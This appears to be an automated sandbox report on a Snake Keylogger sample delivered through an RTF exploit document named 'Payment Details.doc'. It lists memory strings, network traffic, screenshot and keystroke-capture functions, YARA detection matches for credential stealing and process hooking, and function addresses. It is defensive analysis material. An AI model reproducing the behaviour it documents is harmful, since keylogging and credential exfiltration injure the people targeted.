                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002521000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002564000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
                Source: ncfplgpeter20306.exe, 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002521000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002564000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025D9000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.000000000260B000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002564000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003547000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000034FB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002725000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: ncfplgpeter20306.exe, 00000009.00000002.907062154.0000000000822000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.00000000026E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/favicon.ico
                Source: ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=net
                Source: ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                Source: ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=wmf
                Source: ncfplgpeter20306.exe, 00000009.00000002.907194224.0000000002738000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003651000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003686000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000035D2000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index
                Source: ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003588000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                Source: ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003588000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000359D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                Source: ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000035AA000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000363C000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.000000000365E000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.00000000035E2000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003696000.00000004.00000800.00020000.00000000.sdmp, ncfplgpeter20306.exe, 00000009.00000002.907619571.0000000003588000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/indextest
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49178
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49177
                Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
                Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49177 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49178 -> 443
                Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49178 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode

                System Summary

                Source: initial sample Static file information: Filename: Payment Details.doc
                Source: Payment Details.doc, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: ncfplgpeter20306.exe PID: 3444, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: ncfplgpeter20306.exe PID: 3520, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Process Stats: CPU usage > 49%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe Memory allocated: 770B0000 page execute and read and write
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BF0E89_2_008BF0E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BA8F99_2_008BA8F9
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B04F89_2_008B04F8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B1CF09_2_008B1CF0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BC2089_2_008BC208
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BF4089_2_008BF408
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B00069_2_008B0006
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B18189_2_008B1818
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BAC189_2_008BAC18
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B30109_2_008B3010
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BAC289_2_008BAC28
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B18289_2_008B1828
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BDE289_2_008BDE28
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BC8489_2_008BC848
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BFA489_2_008BFA48
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B00409_2_008B0040
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BB2689_2_008BB268
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B3E689_2_008B3E68
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BE4689_2_008BE468
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BE7889_2_008BE788
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BB5889_2_008BB588
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B399D9_2_008B399D
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BD1A89_2_008BD1A8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BD1A09_2_008BD1A0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B21B89_2_008B21B8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B9BB89_2_008B9BB8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BBBC89_2_008BBBC8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BEDC89_2_008BEDC8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B09C09_2_008B09C0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B09D09_2_008B09D0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BD7E89_2_008BD7E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BDB089_2_008BDB08
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BA9089_2_008BA908
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B05089_2_008B0508
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BC5289_2_008BC528
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BF7289_2_008BF728
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BAF489_2_008BAF48
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B2B489_2_008B2B48
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BE1489_2_008BE148
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B134F9_2_008B134F
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BCB579_2_008BCB57
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BCB689_2_008BCB68
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B13609_2_008B1360
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D00409_2_008D0040
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D57889_2_008D5788
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DDE889_2_008DDE88
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D71889_2_008D7188
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DD1809_2_008DD180
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D4A809_2_008D4A80
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D64809_2_008D6480
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D7E9E9_2_008D7E9E
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D71989_2_008D7198
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D8B989_2_008D8B98
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D64909_2_008D6490
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DF2A89_2_008DF2A8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D8BA89_2_008D8BA8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D7EA09_2_008D7EA0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D98A29_2_008D98A2
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D34B99_2_008D34B9
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DBBB89_2_008DBBB8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D98B09_2_008D98B0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DAEB09_2_008DAEB0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D4ECE9_2_008D4ECE
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D34C89_2_008D34C8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DBBC89_2_008DBBC8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DC8C19_2_008DC8C1
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DAEC09_2_008DAEC0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D41C09_2_008D41C0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D4ED89_2_008D4ED8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DD5D89_2_008DD5D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DFBD89_2_008DFBD8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D68DA9_2_008D68DA
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DC8D09_2_008DC8D0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D41D09_2_008D41D0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D5BD29_2_008D5BD2
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D68E89_2_008D68E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D5BE09_2_008D5BE0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DE4E09_2_008DE4E0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D82F89_2_008D82F8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D75F09_2_008D75F0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D8FF09_2_008D8FF0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D9D089_2_008D9D08
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DB3089_2_008DB308
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D90009_2_008D9000
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DB3189_2_008DB318
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D461A9_2_008D461A
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DEE109_2_008DEE10
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D39109_2_008D3910
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DC0109_2_008DC010
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D00129_2_008D0012
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DCD289_2_008DCD28
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D46289_2_008D4628
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D60289_2_008D6028
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D53269_2_008D5326
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DC0209_2_008DC020
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D39209_2_008D3920
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D7A3E9_2_008D7A3E
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D60389_2_008D6038
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DF7319_2_008DF731
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D53309_2_008D5330
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DDA309_2_008DDA30
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D6D309_2_008D6D30
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D7A489_2_008D7A48
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D94489_2_008D9448
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DF7409_2_008DF740
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D6D409_2_008D6D40
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D87409_2_008D8740
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D305F9_2_008D305F
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DAA599_2_008DAA59
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D94589_2_008D9458
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D87509_2_008D8750
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D3D699_2_008D3D69
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DAA689_2_008DAA68
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DC4689_2_008DC468
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DB7609_2_008DB760
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D3D789_2_008D3D78
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DC4789_2_008DC478
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DE9789_2_008DE978
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D57789_2_008D5778
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DDE789_2_008DDE78
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DB7709_2_008DB770
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D30709_2_008D3070
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D4A709_2_008D4A70
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009457B89_2_009457B8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009450D89_2_009450D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009449F89_2_009449F8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009443189_2_00944318
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00943C389_2_00943C38
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009435589_2_00943558
